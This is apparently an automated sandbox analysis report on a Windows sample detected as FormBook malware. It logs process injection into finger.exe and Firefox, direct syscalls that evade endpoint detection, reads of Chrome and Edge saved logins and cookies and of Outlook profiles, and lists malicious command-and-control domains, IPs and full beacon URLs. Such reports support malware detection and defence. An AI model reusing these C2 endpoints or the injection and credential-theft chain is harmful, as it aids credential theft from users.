                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: NULL target: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 6648Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess created: C:\Users\user\Desktop\wSoShbuXnJ.exe "C:\Users\user\Desktop\wSoShbuXnJ.exe"Jump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeQueries volume information: C:\Users\user\Desktop\wSoShbuXnJ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588797 Sample: wSoShbuXnJ.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 30 www.pbfgm.xyz 2->30 32 www.e8af.xyz 2->32 34 8 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 4 other signatures 2->52 10 wSoShbuXnJ.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 file5 28 C:\Users\user\AppData\...\wSoShbuXnJ.exe.log, ASCII 10->28 dropped 13 wSoShbuXnJ.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 RAdsmABlJtKpzt.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 finger.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 RAdsmABlJtKpzt.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 www.btblxhh.top 156.234.28.101, 49990, 49991, 49992 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 22->36 38 www.primespot.live 209.74.79.42, 49994, 49995, 49996 MULTIBAND-NEWHOPEUS United States 22->38 40 7 other IPs or domains 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                wSoShbuXnJ.exe76%VirustotalBrowse
                wSoShbuXnJ.exe71%ReversingLabsWin32.Trojan.Leonem
                wSoShbuXnJ.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF100%Avira URL Cloudmalware
                http://www.graviton.energy/images/favicons/manifest.json0%Avira URL Cloudsafe
                http://www.graviton.energy/y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhn100%Avira URL Cloudmalware
                http://www.ausyva4.top/p9tq/100%Avira URL Cloudmalware
                https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/favicon-32x32.png0%Avira URL Cloudsafe
                http://www.graviton.energy/images/logo-hosttech.svg0%Avira URL Cloudsafe
                http://www.elinor.club/1ne4/100%Avira URL Cloudmalware
                http://www.graviton.energy/images/favicons/browserconfig.xml0%Avira URL Cloudsafe
                http://www.primespot.live/b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhn100%Avira URL Cloudmalware
                http://www.graviton.energy/css/app.css0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/favicon.ico0%Avira URL Cloudsafe
                http://www.e8af.xyz100%Avira URL Cloudmalware
                http://www.btblxhh.top/dp9c/0%Avira URL Cloudsafe
                http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w==100%Avira URL Cloudmalware
                http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&amp;rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m100%Avira URL Cloudmalware
                http://www.graviton.energy/../images/bg-landing-page.jpg0%Avira URL Cloudsafe
                http://www.e8af.xyz/hhdc/100%Avira URL Cloudmalware
                http://www.smalleyes.icu/s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhn0%Avira URL Cloudsafe
                http://www.pbfgm.xyz/fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw==0%Avira URL Cloudsafe
                https://www.hosttech.ch0%Avira URL Cloudsafe
                http://www.graviton.energy/y54z/100%Avira URL Cloudmalware
                http://www.mohawktooldie.online/e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ==0%Avira URL Cloudsafe
                http://www.graviton.energy/images/favicons/safari-pinned-tab.svg0%Avira URL Cloudsafe
                http://www.elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn100%Avira URL Cloudmalware
                http://www.graviton.energy/images/favicons/apple-touch-icon.png0%Avira URL Cloudsafe
                http://www.primespot.live/b8eq/100%Avira URL Cloudmalware
                http://www.graviton.energy/images/favicons/favicon-16x16.png0%Avira URL Cloudsafe
                http://www.smalleyes.icu/s6zh/0%Avira URL Cloudsafe
                https://00808.vip/0%Avira URL Cloudsafe
                http://www.mohawktooldie.online/e1ut/0%Avira URL Cloudsafe
                http://www.graviton.energy/js/app.js0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.mohawktooldie.online
                		208.91.197.27
                		truetrue
                  		unknown
                  www.smalleyes.icu
                  		134.122.191.187
                  		truetrue
                    		unknown
                    www.ausyva4.top
                    		104.21.48.233
                    		truetrue
                      		unknown
                      www.pbfgm.xyz
                      		104.21.86.111
                      		truetrue
                        		unknown
                        www.elinor.club
                        		194.58.112.174
                        		truefalse
                          		high
                          www.e8af.xyz
                          		3.252.97.86
                          		truetrue
                            		unknown
                            www.primespot.live
                            		209.74.79.42
                            		truetrue
                              		unknown
                              www.btblxhh.top
                              		156.234.28.101
                              		truetrue
                                		unknown
                                www.graviton.energy
                                		185.101.158.113
                                		truetrue
                                  		unknown
                                  www.phdcoach.pro
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.ausyva4.top/p9tq/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.graviton.energy/y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhntrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.primespot.live/b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhntrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.elinor.club/1ne4/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.btblxhh.top/dp9c/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.e8af.xyz/hhdc/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.smalleyes.icu/s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhntrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mohawktooldie.online/e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.pbfgm.xyz/fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.graviton.energy/y54z/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.primespot.live/b8eq/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhntrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.smalleyes.icu/s6zh/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mohawktooldie.online/e1ut/true
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFFfinger.exe, 0000000B.00000002.3141353957.0000000004078000.00000004.10000000.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000003B18000.00000004.00000001.00040000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabfinger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.graviton.energy/images/favicons/manifest.jsonfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://dts.gnpge.comRAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.networksolutions.com/finger.exe, 0000000B.00000002.3141353957.00000000046C0000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.graviton.energy/images/favicons/browserconfig.xmlfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vdfinger.exe, 0000000B.00000002.3141353957.00000000046C0000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.graviton.energy/images/favicons/favicon-32x32.pngfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.graviton.energy/images/logo-hosttech.svgfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
